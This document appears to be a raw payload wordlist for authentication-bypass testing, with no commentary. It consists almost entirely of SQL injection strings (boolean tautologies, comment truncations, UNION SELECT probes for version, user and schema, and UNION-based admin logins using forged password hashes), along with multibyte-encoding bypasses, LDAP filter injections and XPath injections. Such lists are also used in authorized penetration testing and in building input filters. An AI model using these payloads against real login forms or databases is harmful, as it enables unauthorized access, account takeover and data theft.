-- or #
,
;
'
' --
' –
' '
' #
' and 'one'='one
' and 'one'='one–
' and 1='1
' AND 1=0 UNION ALL SELECT '', '7110eda4d09e062aa5e4a390b0a572ac0d2c0220
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
' and a='a
' AND id IS NULL; --
' and substring(password/text(),1,1)='7
' group by password having 1=1--
' group by userid having 1=1--
' group by username having 1=1--
' or         0=0 #
' or '' '
' OR '' = '
' or ''-'
' or ''*'
' or ''&'
' or ''^'
' or ''='
' OR '1
' or '1'='1
' or '1'='1'--
' or '1'='1'/*
' or '1'='1'#
' or '1′='1
' or 'a'='a
' or 'one'='one
' or 'one'='one–
' or 'x'='x
' OR 'x'='x
‘ or ‘x’='x
' OR 'x'='x'#;
' or "
' or "a" or '
' or /* or '
' or 0=0 --
' or 0=0 –
' or 0=0 #
‘ or 0=0 #
' OR 1 -- -
' or 1 or '
' or 1]%00
' or 1=1
' or 1=1 --
' OR 1=1 --+
' or 1=1 –
‘ or 1=1 –
' or 1=1 limit 1 -- -+
' or 1=1 LIMIT 1;#
' or 1=1--
' or 1=1-- -
' or 1=1–
‘ or 1=1–
' or 1=1;#
' or 1=1/*
' or 1=1#
' or a=a--
' or a=a–
‘ or a=a–
' or true--
' or true() or '
' or uid like '%
' or uname like '%
' or user like '%
' or userid like '%
' or username like '%
' UNION ALL SELECT 1, @@version;#
' UNION ALL SELECT system_user(),user();#
' UniON SElecT 1,2-- 2
' UniON SElecT 1,2,3-- 2
' UniON SElecT 1,2,3,4-- 2
' UniON SElecT 1,2,3,4,5-- 2
' UniON SElecT 1,2,3,4,5#
' UnION SELeCT 1,2,3,4,5`
' UniON SElecT 1,2,3,4#
' UnION SELeCT 1,2,3,4`
' UniON SElecT 1,2,3#
' UnION SELeCT 1,2,3`
' UniON SElecT 1,2#
' UnION SELeCT 1,2`
' UNION select table_schema,table_name FROM information_Schema.tables;#
'--
'-- 2
'-'
'-''-- 2
'-''/*
'-''#
''
'''''''''''''UNION SELECT '2
')
') or '1'='1
') or '1'='1--
') or '1'='1'--
') or '1'='1'/*
') or '1'='1'#
') or ('1'='1
') or ('1'='1--
') or ('1'='1'--
') or ('1'='1'/*
') or ('1'='1'#
') or ('a'='a
‘) or (‘a’='a
') or ('a'='a and hi") or ("a"="a
') or ('x')=('x
') or ('x'='x
‘) or (‘x’='x
') or 1=1-- -
') or 1=1/*
') or 1=1#
') or true--
') UniON SElecT 1,2-- 2
') UniON SElecT 1,2,3-- 2
') UniON SElecT 1,2,3,4-- 2
') UniON SElecT 1,2,3,4,5-- 2
') UniON SElecT 1,2,3,4,5#
') UniON SElecT 1,2,3,4#
') UniON SElecT 1,2,3#
') UniON SElecT 1,2#
')-- 2
')-''-- 2
')-''/*
')-''#
')-('
')) or (('x'))=(('x
')*''-- 2
')*''/*
')*''#
')*('
')/*
')&''-- 2
')&''/*
')&''#
')&('
')#
')^''-- 2
')^''/*
')^''#
')^('
')=''-- 2
')=''/*
')=''#
')=('
')||'2'='2'||('
')||'2'=('2
')||'2'||('
')||'2'LiKE'2'-- 2
')||'2'LiKE'2'/*
')||'2'LiKE'2'#
')||'2'LiKE'2'||('
')||'2'LiKE('2
')||('2
')||(2)LiKE(2)-- 2
')||(2)LiKE(2)/*
')||(2)LiKE(2)#
')||(2)LiKE(2)||('
')||2-- 2
')||2/*
')||2#
')||2=(2)LimIT(1)-- 2
')||2=(2)LimIT(1)/*
')||2=(2)LimIT(1)#
')||2=2-- 2
')||2=2/*
')||2=2#
')||2=2||('
')||2||('
')||true-- 2
')||true/*
')||true#
')||true||('
')oR 2 oR('
')oR 2-- 2
')oR 2/*
')oR 2#
')oR 2=2 oR('
')oR 2=2-- 2
')oR 2=2/*
')oR 2=2#
')oR true oR('
')oR true-- 2
')oR true/*
')oR true#
')oR'2'-- 2
')oR'2'/*
')oR'2'#
')oR'2'='2' LimIT 1-- 2
')oR'2'='2' LimIT 1/*
')oR'2'='2' LimIT 1#
')oR'2'='2'-- 2
')oR'2'='2'/*
')oR'2'='2'#
')oR'2'='2'oR('
')oR'2'=('2
')oR'2'LiKE'2'-- 2
')oR'2'LiKE'2'/*
')oR'2'LiKE'2'#
')oR'2'LiKE'2'oR('
')oR'2'LiKE('2
')oR'2'oR('
')oR('2
')oR(2)-- 2
')oR(2)/*
')oR(2)#
')oR(2)=(2)LimIT(1)-- 2
')oR(2)=(2)LimIT(1)/*
')oR(2)=(2)LimIT(1)#
')oR(2)=(2)oR('
')oR(2)=2-- 2
')oR(2)=2/*
')oR(2)=2#
')oR(2)LiKE(2)-- 2
')oR(2)LiKE(2)/*
')oR(2)LiKE(2)#
')oR(2)LiKE(2)oR('
')oR(2)oR('
')oR(true)-- 2
')oR(true)/*
')oR(true)#
')oR(true)oR('
')oR/**/2-- 2
')oR/**/2/*
')oR/**/2/**/oR('
')oR/**/2#
')oR/**/2=2-- 2
')oR/**/2=2/*
')oR/**/2=2/**/oR('
')oR/**/2=2#
')oR/**/true-- 2
')oR/**/true/*
')oR/**/true/**/oR('
')oR/**/true#
')UniON(SElecT(1),2,3,4,5)-- 2
')UniON(SElecT(1),2,3,4,5)#
')UniON(SElecT(1),2,3,4)-- 2
')UniON(SElecT(1),2,3,4)#
')UniON(SElecT(1),2,3)-- 2
')UniON(SElecT(1),2,3)#
')UniON(SElecT(1),2)-- 2
')UniON(SElecT(1),2)#
'*'
'*''-- 2
'*''/*
'*''#
'/*
'&'
'&''-- 2
'&''/*
'&''#
'#
'^'
'^''-- 2
'^''/*
'^''#
'='
'=' 'or' and '=' 'or'
'=''-- 2
'=''/*
'=''#
'="or'
'=0--+
'||'2
'||'2'='2
'||'2'='2'||'
'||'2'||'
'||'2'LiKE'2
'||'2'LiKE'2'-- 2
'||'2'LiKE'2'/*
'||'2'LiKE'2'#
'||'2'LiKE'2'||'
'||(2)LiKE(2)-- 2
'||(2)LiKE(2)/*
'||(2)LiKE(2)#
'||(2)LiKE(2)||'
'||2-- 2
'||2/*
'||2#
'||2=(2)LimIT(1)-- 2
'||2=(2)LimIT(1)/*
'||2=(2)LimIT(1)#
'||2=2-- 2
'||2=2/*
'||2=2#
'||2=2||'
'||2||'
'||true-- 2
'||true/*
'||true#
'||true||'
'LIKE'
'or 1=1 or ''='
'oR 2 oR'
'oR 2-- 2
'oR 2/*
'oR 2#
'oR 2=2 oR'
'oR 2=2-- 2
'oR 2=2/*
'oR 2=2#
'or contains(.,'adm') or'
'or contains(name,'adm') or'
'or position()=2 or'
'or string-length(name(.))&lt;10 or'
'oR true oR'
'oR true-- 2
'oR true/*
'oR true#
'or'1=1
'or'1=1′
'oR'2
'oR'2'-- 2
'oR'2'/*
'oR'2'#
'oR'2'='2
'oR'2'='2' LimIT 1-- 2
'oR'2'='2' LimIT 1/*
'oR'2'='2' LimIT 1#
'oR'2'='2'-- 2
'oR'2'='2'/*
'oR'2'='2'#
'oR'2'='2'oR'
'oR'2'LiKE'2
'oR'2'LiKE'2'-- 2
'oR'2'LiKE'2'/*
'oR'2'LiKE'2'#
'oR'2'LiKE'2'oR'
'oR'2'oR'
'oR(2)-- 2
'oR(2)/*
'oR(2)#
'oR(2)=(2)LimIT(1)-- 2
'oR(2)=(2)LimIT(1)/*
'oR(2)=(2)LimIT(1)#
'oR(2)=(2)oR'
'oR(2)=2-- 2
'oR(2)=2/*
'oR(2)=2#
'oR(2)LiKE(2)-- 2
'oR(2)LiKE(2)/*
'oR(2)LiKE(2)#
'oR(2)LiKE(2)oR'
'oR(2)oR'
'oR(true)-- 2
'oR(true)/*
'oR(true)#
'oR(true)oR'
'oR/**/2-- 2
'oR/**/2/*
'oR/**/2/**/oR'
'oR/**/2#
'oR/**/2=2-- 2
'oR/**/2=2/*
'oR/**/2=2/**/oR'
'oR/**/2=2#
'oR/**/true-- 2
'oR/**/true/*
'oR/**/true/**/oR'
'oR/**/true#
'UniON(SElecT(1),2,3,4,5)-- 2
'UniON(SElecT(1),2,3,4,5)#
'UniON(SElecT(1),2,3,4)-- 2
'UniON(SElecT(1),2,3,4)#
'UniON(SElecT(1),2,3)-- 2
'UniON(SElecT(1),2,3)#
'UniON(SElecT(1),2)-- 2
'UniON(SElecT(1),2)#
"
" --
" "
" #
" AND 1=0 UNION ALL SELECT "", "7110eda4d09e062aa5e4a390b0a572ac0d2c0220
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
" or "" "
" OR "" = "
" or ""-"
" or ""*"
" or ""&"
" or ""^"
" or ""="
" or "1"="1
" or "1"="1"--
" or "1"="1"/*
" or "1"="1"#
" or "a"="a
” or “a”=”a
" or "x"="x
” or “x”=”x
" or 0=0 --
" or 0=0 –
” or 0=0 –
" or 0=0 #
” or 0=0 #
" OR 1 = 1 -- -
" or 1=1
" or 1=1 --
" or 1=1 –
" or 1=1--
" or 1=1-- -
" or 1=1–
” or 1=1–
" or 1=1/*
" or 1=1#
" or true--
" UniON SElecT 1,2-- 2
" UniON SElecT 1,2,3-- 2
" UniON SElecT 1,2,3,4-- 2
" UniON SElecT 1,2,3,4,5-- 2
" UniON SElecT 1,2,3,4,5#
" UnION SELeCT 1,2,3,4,5`
" UniON SElecT 1,2,3,4#
" UnION SELeCT 1,2,3,4`
" UniON SElecT 1,2,3#
" UnION SELeCT 1,2,3`
" UniON SElecT 1,2#
" UnION SELeCT 1,2`
"-- 2
"-"
"-""-- 2
"-""/*
"-""#
""
")
") #
") or "1"="1
") or "1"="1"--
") or "1"="1"/*
") or "1"="1"#
") or ("1"="1
") or ("1"="1"--
") or ("1"="1"/*
") or ("1"="1"#
") or ("a"="a
“) or (“a”=”a
") or ("x")=("x
") or 1=1-- -
") or 1=1/*
") or 1=1#
") or true--
") UniON SElecT 1,2-- 2
") UniON SElecT 1,2,3-- 2
") UniON SElecT 1,2,3,4-- 2
") UniON SElecT 1,2,3,4,5-- 2
") UniON SElecT 1,2,3,4,5#
") UniON SElecT 1,2,3,4#
") UniON SElecT 1,2,3#
") UniON SElecT 1,2#
")-- 2
")-""-- 2
")-""/*
")-""#
")-("
")) or (("x"))=(("x
")*""-- 2
")*""/*
")*""#
")*("
")/*
")&""-- 2
")&""/*
")&""#
")&("
")^""-- 2
")^""/*
")^""#
")^("
")=""-- 2
")=""/*
")=""#
")=("
")||"2"="2"||("
")||"2"=("2
")||"2"||("
")||"2"LiKE"2"-- 2
")||"2"LiKE"2"/*
")||"2"LiKE"2"#
")||"2"LiKE"2"||("
")||"2"LiKE("2
")||("2
")||(2)LiKE(2)-- 2
")||(2)LiKE(2)/*
")||(2)LiKE(2)#
")||(2)LiKE(2)||("
")||2-- 2
")||2/*
")||2#
")||2=(2)LimIT(1)-- 2
")||2=(2)LimIT(1)/*
")||2=(2)LimIT(1)#
")||2=2-- 2
")||2=2/*
")||2=2#
")||2=2||("
")||2||("
")||true-- 2
")||true/*
")||true#
")||true||("
")oR 2 oR("
")oR 2-- 2
")oR 2/*
")oR 2#
")oR 2=2 oR("
")oR 2=2-- 2
")oR 2=2/*
")oR 2=2#
")oR true oR("
")oR true-- 2
")oR true/*
")oR true#
")oR"2"-- 2
")oR"2"/*
")oR"2"#
")oR"2"="2" LimIT 1-- 2
")oR"2"="2" LimIT 1/*
")oR"2"="2" LimIT 1#
")oR"2"="2"-- 2
")oR"2"="2"/*
")oR"2"="2"#
")oR"2"="2"oR("
")oR"2"=("2
")oR"2"LiKE"2"-- 2
")oR"2"LiKE"2"/*
")oR"2"LiKE"2"#
")oR"2"LiKE"2"oR("
")oR"2"LiKE("2
")oR"2"oR("
")oR("2
")oR(2)-- 2
")oR(2)/*
")oR(2)#
")oR(2)=(2)LimIT(1)-- 2
")oR(2)=(2)LimIT(1)/*
")oR(2)=(2)LimIT(1)#
")oR(2)=(2)oR("
")oR(2)=2-- 2
")oR(2)=2/*
")oR(2)=2#
")oR(2)LiKE(2)-- 2
")oR(2)LiKE(2)/*
")oR(2)LiKE(2)#
")oR(2)LiKE(2)oR("
")oR(2)oR("
")oR(true)-- 2
")oR(true)/*
")oR(true)#
")oR(true)oR("
")oR/**/2-- 2
")oR/**/2/*
")oR/**/2/**/oR("
")oR/**/2#
")oR/**/2=2-- 2
")oR/**/2=2/*
")oR/**/2=2/**/oR("
")oR/**/2=2#
")oR/**/true-- 2
")oR/**/true/*
")oR/**/true/**/oR("
")oR/**/true#
")UniON(SElecT(1),2,3,4,5)-- 2
")UniON(SElecT(1),2,3,4,5)#
")UniON(SElecT(1),2,3,4)-- 2
")UniON(SElecT(1),2,3,4)#
")UniON(SElecT(1),2,3)-- 2
")UniON(SElecT(1),2,3)#
")UniON(SElecT(1),2)-- 2
")UniON(SElecT(1),2)#
"*"
"*""-- 2
"*""/*
"*""#
"/*
"&"
"&""-- 2
"&""/*
"&""#
"^"
"^""-- 2
"^""/*
"^""#
"="
"=""-- 2
"=""/*
"=""#
"||"2
"||"2"="2
"||"2"="2"||"
"||"2"||"
"||"2"LiKE"2
"||"2"LiKE"2"-- 2
"||"2"LiKE"2"/*
"||"2"LiKE"2"#
"||"2"LiKE"2"||"
"||(2)LiKE(2)-- 2
"||(2)LiKE(2)/*
"||(2)LiKE(2)#
"||(2)LiKE(2)||"
"||2-- 2
"||2/*
"||2#
"||2=(2)LimIT(1)-- 2
"||2=(2)LimIT(1)/*
"||2=(2)LimIT(1)#
"||2=2-- 2
"||2=2/*
"||2=2#
"||2=2||"
"||2||"
"||true-- 2
"||true/*
"||true#
"||true||"
"or 1=1 or ""="
"oR 2 oR"
"oR 2-- 2
"oR 2/*
"oR 2#
"oR 2=2 oR"
"oR 2=2-- 2
"oR 2=2/*
"oR 2=2#
"oR true oR"
"oR true-- 2
"oR true/*
"oR true#
"oR"2
"oR"2"-- 2
"oR"2"/*
"oR"2"#
"oR"2"="2
"oR"2"="2" LimIT 1-- 2
"oR"2"="2" LimIT 1/*
"oR"2"="2" LimIT 1#
"oR"2"="2"-- 2
"oR"2"="2"/*
"oR"2"="2"#
"oR"2"="2"oR"
"oR"2"LiKE"2
"oR"2"LiKE"2"-- 2
"oR"2"LiKE"2"/*
"oR"2"LiKE"2"#
"oR"2"LiKE"2"oR"
"oR"2"oR"
"oR(2)-- 2
"oR(2)/*
"oR(2)#
"oR(2)=(2)LimIT(1)-- 2
"oR(2)=(2)LimIT(1)/*
"oR(2)=(2)LimIT(1)#
"oR(2)=(2)oR"
"oR(2)=2-- 2
"oR(2)=2/*
"oR(2)=2#
"oR(2)LiKE(2)-- 2
"oR(2)LiKE(2)/*
"oR(2)LiKE(2)#
"oR(2)LiKE(2)oR"
"oR(2)oR"
"oR(true)-- 2
"oR(true)/*
"oR(true)#
"oR(true)oR"
"oR/**/2-- 2
"oR/**/2/*
"oR/**/2/**/oR"
"oR/**/2#
"oR/**/2=2-- 2
"oR/**/2=2/*
"oR/**/2=2/**/oR"
"oR/**/2=2#
"oR/**/true-- 2
"oR/**/true/*
"oR/**/true/**/oR"
"oR/**/true#
"UniON(SElecT(1),2,3,4,5)-- 2
"UniON(SElecT(1),2,3,4,5)#
"UniON(SElecT(1),2,3,4)-- 2
"UniON(SElecT(1),2,3,4)#
"UniON(SElecT(1),2,3)-- 2
"UniON(SElecT(1),2,3)#
"UniON(SElecT(1),2)-- 2
"UniON(SElecT(1),2)#
) or '1′='1–
) or ('1′='1–
*
*)(&
*)(|(*
*)(|(&
*))%00
/
//
\
\\
%' or '0'='0
%00
%8C%A8%27 Or 1-- 2
%8C%A8%27 Or 1=1-- 2
%8C%A8%27) Or 1-- 2
%8C%A8%27) Or 1=1-- 2
%8C%A8%27)||1-- 2
%8C%A8%27)Or(1)-- 2
%8C%A8%27||1-- 2
%8C%A8%27Or(1)-- 2
%A8%27 Or 1-- 2
%A8%27 Or 1=1-- 2
%A8%27) Or 1-- 2
%A8%27) Or 1=1-- 2
%A8%27)||1-- 2
%A8%27)Or(1)-- 2
%A8%27||1-- 2
%A8%27Or(1)-- 2
%bf' Or 1-- 2
%bf' Or 1=1 -- 2
%bf') Or 1-- 2
%bf') Or 1=1 -- 2
%bf')||1-- 2
%bf')Or(1)-- 2
%bf'||1-- 2
%bf'Or(1)-- 2
`
``
=
==
0')&lt;'2'-- 2
0')&lt;'2'/*
0')&lt;'2'#
0')&lt;('2
0'&lt;'2
0'&lt;'2'-- 2
0'&lt;'2'/*
0'&lt;'2'#
0")&lt;"2-- 2
0")&lt;"2/*
0")&lt;"2#
0")&lt;("2
0"&lt;"2
0"&lt;"2"-- 2
0"&lt;"2"/*
0"&lt;"2"#
1-false
1-true
1'or’1'=’1
1*56
1′) and '1′='1–
1234 ' AND 1=0 UNION ALL SELECT 'admin', '7110eda4d09e062aa5e4a390b0a572ac0d2c0220
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
1234 " AND 1=0 UNION ALL SELECT "admin", "7110eda4d09e062aa5e4a390b0a572ac0d2c0220
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
admin' --
admin' #
admin' and substring(password/text(),1,1)='7
admin' or '
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'/*
admin' or '1'='1'#
admin' or '1'='2
admin' or 1=1
admin' or 1=1--
admin' or 1=1/*
admin' or 1=1#
admin'-- 2
admin’–
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'/*
admin') or '1'='1'#
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'/*
admin') or ('1'='1'#
admin')-- 2
admin')/*
admin')#
admin'/*
admin'#
admin'or 1=1 or ''='
admin" --
admin" #
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"/*
admin" or "1"="1"#
admin" or 1=1
admin" or 1=1--
admin" or 1=1/*
admin" or 1=1#
admin"-- 2
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"/*
admin") or "1"="1"#
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"/*
admin") or ("1"="1"#
admin")-- 2
admin")#
admin"/*
admin"#
admin"or 1=1 or ""="
admin)(!(&(|
admin)(&)
admin))(|(|
AND 0
AND 1
and 1=1
and 1=1–
AND false
AND true
ffifdyop
hi’ or ‘a’='a
hi’ or 1=1 –
hi’) or (‘a’='a
hi” or “a”=”a
hi” or 1=1 –
hi”) or (“a”=”)
like '%'
or 0=0 --
or 0=0 –
or 0=0 #
or 1=1
OR 1=1
or 1=1--
or 1=1–
or 1=1/*
or 1=1#
or true
or true--
Pass1234.
Pass1234.' AND 1=0 UniON ALL SeleCT 'admin', md5('Pass1234.
Pass1234.' AND 1=0 UniON ALL SeleCT 'admin', md5('Pass1234.')#
Pass1234.' AND 1=0 UniON SeleCT 'admin', '5b19a9e947ca0fee49995f2a8b359e1392adbb61
Pass1234.' AND 1=0 UniON SeleCT 'admin', '5b19a9e947ca0fee49995f2a8b359e1392adbb61'#
Pass1234.' AND 1=0 UniON SeleCT 'admin', 'fe1ff105bf807478a217ad4e378dc658
Pass1234.' AND 1=0 UniON SeleCT 'admin', 'fe1ff105bf807478a217ad4e378dc658'#
Pass1234.' and 1=0 union select 'admin',sha('Pass1234.
Pass1234.' and 1=0 union select 'admin',sha('Pass1234.')#
Pass1234." AND 1=0 UniON ALL SeleCT "admin", md5("Pass1234.
Pass1234." AND 1=0 UniON ALL SeleCT "admin", md5("Pass1234.")#
Pass1234." AND 1=0 UniON SeleCT "admin", "5b19a9e947ca0fee49995f2a8b359e1392adbb61
Pass1234." AND 1=0 UniON SeleCT "admin", "5b19a9e947ca0fee49995f2a8b359e1392adbb61"#
Pass1234." AND 1=0 UniON SeleCT "admin", "fe1ff105bf807478a217ad4e378dc658
Pass1234." AND 1=0 UniON SeleCT "admin", "fe1ff105bf807478a217ad4e378dc658"#
Pass1234." and 1=0 union select "admin",sha("Pass1234.
Pass1234." and 1=0 union select "admin",sha("Pass1234.")#
pwd
pwd)
pwd))